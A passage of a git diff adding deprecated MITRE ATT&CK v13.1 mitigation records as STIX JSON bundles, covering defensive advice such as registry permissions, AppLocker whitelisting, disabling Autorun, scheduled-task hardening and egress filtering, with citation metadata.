"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ec42d8be-f762-4127-80f4-f079ea6d7135.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ec42d8be-f762-4127-80f4-f079ea6d7135.json new file mode 100644 index 0000000000000000000000000000000000000000..68a7667bf20e4bccd8ceef61614a54cf73cf9af2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ec42d8be-f762-4127-80f4-f079ea6d7135.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--2d532493-996c-43ca-a0a4-9df85db9883f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--ec42d8be-f762-4127-80f4-f079ea6d7135", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1054", + "external_id": "T1054" + }, + { + "url": "https://docs.microsoft.com/windows/desktop/etw/event-tracing-portal", + "description": "Microsoft. (2018, May 30). Event Tracing. Retrieved September 6, 2018.", + "source_name": "Microsoft ETW May 2018" + } + ], + "modified": "2019-07-24T19:39:30.292Z", + "name": "Indicator Blocking Mitigation", + "description": "Ensure event tracers/forwarders (Citation: Microsoft ETW May 2018), firewall policies, and other associated mechanisms are secured with appropriate permissions and access controls. Consider automatically relaunching forwarding mechanisms at recurring intervals (ex: temporal, on-logon, etc.) as well as applying appropriate change management to firewall rules and other related system configurations.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ed202147-4026-4330-b5bd-1e8dfa8cf7cc.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ed202147-4026-4330-b5bd-1e8dfa8cf7cc.json new file mode 100644 index 0000000000000000000000000000000000000000..2e1aa68aa068ae048c8e6a3c418df31a0ca7ca58 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ed202147-4026-4330-b5bd-1e8dfa8cf7cc.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--1c55bf78-813d-450d-91ab-2021750cbcb4", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--ed202147-4026-4330-b5bd-1e8dfa8cf7cc", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1112", + "url": "https://attack.mitre.org/mitigations/T1112", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.884Z", + "name": "Modify Registry Mitigation", + "description": "Misconfiguration of permissions in the Registry may lead to opportunities for an adversary to execute code, like through [Service Registry Permissions Weakness](https://attack.mitre.org/techniques/T1058). Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.\n\nIdentify and block unnecessary system utilities or potentially malicious software that may be used to modify the Registry by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ef273807-c465-4728-9cee-5823422f42ee.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ef273807-c465-4728-9cee-5823422f42ee.json new file mode 100644 index 0000000000000000000000000000000000000000..25ab7ecff27db1272e72caf48d4fc892e4219bcc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ef273807-c465-4728-9cee-5823422f42ee.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--bcaccd62-5d39-4657-b4ed-436e1d01430a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--ef273807-c465-4728-9cee-5823422f42ee", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1198", + "external_id": "T1198" + }, + { + "source_name": "SpectorOps Subverting Trust Sept 2017", + "description": "Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.", + "url": "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf" + } + ], + "modified": "2019-07-25T11:38:03.304Z", + "name": "SIP and Trust Provider Hijacking Mitigation", + "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys related to SIP and trust provider components. Also ensure that these values contain their full path to prevent [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nConsider removing unnecessary and/or stale SIPs. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nRestrict storage and execution of SIP DLLs to protected directories, such as C:\\Windows, rather than user directories.\n\nEnable whitelisting solutions such as AppLocker and/or Device Guard to block the loading of malicious SIP DLLs. Components may still be able to be hijacked to suitable functions already present on disk if malicious modifications to Registry keys are not prevented.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--effb83a0-ead1-4b36-b7f6-b7bdf9c4616e.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--effb83a0-ead1-4b36-b7f6-b7bdf9c4616e.json new file mode 100644 index 0000000000000000000000000000000000000000..23e141678a409f493950649d8356711d3736fa1e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--effb83a0-ead1-4b36-b7f6-b7bdf9c4616e.json @@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--342bef7d-e7b3-4763-bfc6-dff1a1611310", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--effb83a0-ead1-4b36-b7f6-b7bdf9c4616e", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1091", + "url": "https://attack.mitre.org/mitigations/T1091", + "source_name": "mitre-attack" + }, + { + "source_name": "Microsoft Disable Autorun", + "description": "Microsoft. (n.d.). How to disable the Autorun functionality in Windows. Retrieved April 20, 2016.", + "url": "https://support.microsoft.com/en-us/kb/967715" + }, + { + "source_name": "TechNet Removable Media Control", + "description": "Microsoft. (2007, August 31). https://technet.microsoft.com/en-us/library/cc771759(v=ws.10).aspx. Retrieved April 20, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.877Z", + "name": "Replication Through Removable Media Mitigation", + "description": "Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if it is not required for business operations. (Citation: TechNet Removable Media Control)\n\nIdentify potentially malicious software that may be used to infect removable media or may result from tainted removable media, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f0a42cad-9b1f-44da-a672-718f18381018.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f0a42cad-9b1f-44da-a672-718f18381018.json new file mode 100644 index 0000000000000000000000000000000000000000..c64e31adfba165d8aca1dfb83708a3432ad3393c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f0a42cad-9b1f-44da-a672-718f18381018.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--db8fe07b-40ad-4c8a-ac56-9302d2b954fd", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--f0a42cad-9b1f-44da-a672-718f18381018", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1080", + "external_id": "T1080" + }, + { + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "source_name": "Beechey 2010" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "source_name": "Corio 2008" + }, + { + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "source_name": "TechNet Applocker vs SRP" + } + ], + "modified": "2021-08-23T20:25:21.481Z", + "name": "Taint Shared Content Mitigation", + "description": "Protect shared folders by minimizing users who have write access. Use utilities that detect or mitigate common features used in exploitation, such as the Microsoft Enhanced Mitigation Experience Toolkit (EMET).\n\nReduce potential lateral movement risk by using web-based document management and collaboration services that do not use network file and directory sharing.\n\nIdentify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f27ef4f2-71fe-48b6-b7f4-02dcac14320e.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f27ef4f2-71fe-48b6-b7f4-02dcac14320e.json new file mode 100644 index 0000000000000000000000000000000000000000..40da2734f4b73f97f2a5697fa1d94b85a747ff5d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f27ef4f2-71fe-48b6-b7f4-02dcac14320e.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--0121c85b-d301-4aed-bb2f-18da6817b354", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--f27ef4f2-71fe-48b6-b7f4-02dcac14320e", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1145", + "external_id": "T1145" + } + ], + "modified": "2019-07-25T11:27:03.265Z", + "name": "Private Keys Mitigation", + "description": "Use strong passphrases for private keys to make cracking difficult. When possible, store keys on separate cryptographic hardware instead of on the local system. Ensure only authorized keys are allowed access to critical resources and audit access lists regularly. Ensure permissions are properly set on folders containing sensitive private keys to prevent unintended access. Use separate infrastructure for managing critical systems to prevent overlap of credentials and permissions on systems that could be used as vectors for lateral movement. Follow other best practices for mitigating access through use of [Valid Accounts](https://attack.mitre.org/techniques/T1078).", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f2cb6ce2-188d-4162-8feb-594f949b13dd.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f2cb6ce2-188d-4162-8feb-594f949b13dd.json new file mode 100644 index 0000000000000000000000000000000000000000..ca4ece49f81e14988fab405b37d1263c8e36033b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f2cb6ce2-188d-4162-8feb-594f949b13dd.json @@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--bfee96fe-97ef-4901-910d-2dfabde7b06a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--f2cb6ce2-188d-4162-8feb-594f949b13dd", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1053", + "url": "https://attack.mitre.org/mitigations/T1053", + "source_name": "mitre-attack" + }, + { + "url": "https://github.com/mattifestation/PowerSploit", + "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", + "source_name": "Powersploit" + }, + { + "source_name": "TechNet Server Operator Scheduled Task", + "description": "Microsoft. (2012, November 15). Domain controller: Allow server operators to schedule tasks. Retrieved December 18, 2017.", + "url": "https://technet.microsoft.com/library/jj852168.aspx" + }, + { + "source_name": "TechNet Scheduling Priority", + "description": "Microsoft. (2013, May 8). Increase scheduling priority. Retrieved December 18, 2017.", + "url": "https://technet.microsoft.com/library/dn221960.aspx" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:19.375Z", + "name": "Scheduled Task Mitigation", + "description": "Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges. (Citation: Powersploit)\n\nConfigure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM. The associated Registry key is located at HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\SubmitControl. The setting can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > Security Options: Domain Controller: Allow server operators to schedule tasks, set to disabled. (Citation: TechNet Server Operator Scheduled Task)\n\nConfigure the Increase Scheduling Priority option to only allow the Administrators group the rights to schedule a priority process. This can be can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Increase scheduling priority. (Citation: TechNet Scheduling Priority)\n\nIdentify and block unnecessary system utilities or potentially malicious software that may be used to schedule tasks using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f2dcee22-c275-405e-87fd-48630a19dfba.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f2dcee22-c275-405e-87fd-48630a19dfba.json new file mode 100644 index 0000000000000000000000000000000000000000..a67e35e91f43f9e22c55e082c4053486a1ff8ca7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f2dcee22-c275-405e-87fd-48630a19dfba.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--cca9f8a7-d131-4914-8f9f-9ece7a660ee0", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--f2dcee22-c275-405e-87fd-48630a19dfba", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1203", + "external_id": "T1203" + }, + { + "url": "https://blogs.windows.com/msedgedev/2017/03/23/strengthening-microsoft-edge-sandbox/", + "description": "Cowan, C. (2017, March 23). Strengthening the Microsoft Edge Sandbox. Retrieved March 12, 2018.", + "source_name": "Windows Blogs Microsoft Edge Sandbox" + }, + { + "url": "https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/", + "description": "Goodin, D. (2017, March 17). Virtual machine escape fetches $105,000 at Pwn2Own hacking contest - updated. Retrieved March 12, 2018.", + "source_name": "Ars Technica Pwn2Own 2017 VM Escape" + }, + { + "url": "https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/", + "description": "Nunez, N. (2017, August 9). Moving Beyond EMET II \u2013 Windows Defender Exploit Guard. Retrieved March 12, 2018.", + "source_name": "TechNet Moving Beyond EMET" + }, + { + "url": "https://en.wikipedia.org/wiki/Control-flow_integrity", + "description": "Wikipedia. (2018, January 11). Control-flow integrity. Retrieved March 12, 2018.", + "source_name": "Wikipedia Control Flow Integrity" + } + ], + "modified": "2019-07-24T19:22:39.193Z", + "name": "Exploitation for Client Execution Mitigation", + "description": "Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist. (Citation: Windows Blogs Microsoft Edge Sandbox) (Citation: Ars Technica Pwn2Own 2017 VM Escape)\n\nOther types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)\n\nSecurity applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f3d0c735-330f-43c2-8e8e-51bcfa51e8c3.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f3d0c735-330f-43c2-8e8e-51bcfa51e8c3.json new file mode 100644 index 0000000000000000000000000000000000000000..3397688d42dfe69bb8073f8281e18831d118ebfd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f3d0c735-330f-43c2-8e8e-51bcfa51e8c3.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--495ab9ef-17fd-4005-9aad-975f4816ee01", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--f3d0c735-330f-43c2-8e8e-51bcfa51e8c3", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1094", + "external_id": "T1094" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "modified": "2019-07-24T18:13:22.017Z", + "name": "Custom Command and Control Protocol Mitigation", + "description": "Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.\n\nNetwork intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f6469191-1814-4dbe-a081-2a6daf83a10b.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f6469191-1814-4dbe-a081-2a6daf83a10b.json new file mode 100644 index 0000000000000000000000000000000000000000..58dc6cff5c379ead828117b164955c7f0a582fc8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f6469191-1814-4dbe-a081-2a6daf83a10b.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--0bdf2e41-701e-46a5-88ed-24d9c13ac678", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--f6469191-1814-4dbe-a081-2a6daf83a10b", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1057", + "url": "https://attack.mitre.org/mitigations/T1057", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.656Z", + "name": "Process Discovery Mitigation", + "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about processes, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f6b7c116-0821-4eb7-9b24-62bd09b3e575.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f6b7c116-0821-4eb7-9b24-62bd09b3e575.json new file mode 100644 index 0000000000000000000000000000000000000000..363e12083da6fe4c9260efd324a939183956e3d7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f6b7c116-0821-4eb7-9b24-62bd09b3e575.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": 